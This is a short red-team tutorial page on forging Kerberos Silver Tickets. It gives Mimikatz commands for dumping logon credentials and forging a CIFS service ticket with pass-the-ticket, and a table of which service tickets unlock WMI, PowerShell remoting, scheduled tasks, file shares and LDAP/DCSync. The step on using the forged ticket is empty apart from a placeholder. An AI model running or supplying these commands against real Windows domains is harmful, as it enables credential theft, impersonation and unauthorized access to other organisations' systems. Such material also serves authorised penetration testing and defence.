🥈Silver Ticket

A Kerberos Silver Ticket is another type of forged authentication ticket used in Kerberos-based authentication systems. Unlike a Golden Ticket, which grants full administrative access to a domain cont

A Kerberos Silver Ticket is another type of forged authentication ticket used in Kerberos-based authentication systems. Unlike a Golden Ticket, which grants full administrative access to a domain controller, a Silver Ticket provides unauthorized access to a specific service or resource within the network.

Silver Tickets = Forged Ticket Granting Service (TGS) tickets

Silver Ticket – Requires service hash. Use for persistence and escalation

ATT&CK® Tactic: Credential Access

ATT&CK Technique:T1558.002

Learn the Theory Behind Silver Tickets Attacks

Requirements to forge a Silver Ticket

Service hash required

MimiKatz ParameterInfoExample

/domain

Domain

poplabsec.rfs

/sid

AD Domain SID

/user

User to create or impersonate

/target

FQDN from the server

/service

Service name to attack

/rc4

NTLM/RC4 hash

Step 1 - Get a Service or Computer account Password Hash

Invoke MimiKatz

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"
Step 2 - Crack NTLM Hash

Step 3 - Generate the Silver Ticket

Remember to select the user you want to impersonate or create a new one

mimikatz.exe "kerberos::golden /user:NonExistentUser /domain:domain.com /sid:S-1-5-21-5840559-2756745051-1363507867 /rc4:8fbe632c51039f92c21bcef456b31f2b /target:FileServer1.domain.com /service:cifs /ptt" "misc::cmd" exit
Step 4 - Use the Forget Ticket
// Some code
Service TypeService Silver Ticket

WMI

HOST + RPCSS

PSRemote

HOST + HTTP or WSMAN + RPCSS (Depending on OS version)

WinRM

HOST + HTTP

Scheduled Tasks

HOST

Windows File Share (CIFS)

CIFS

LDAP including DCSync

LDAP

Windows RSAT

RPCSS + LDAP + CIFS

How to Create Golden Tickets with MimiKatz?

SERVICE SILVER TICKET

Documentation

Last updated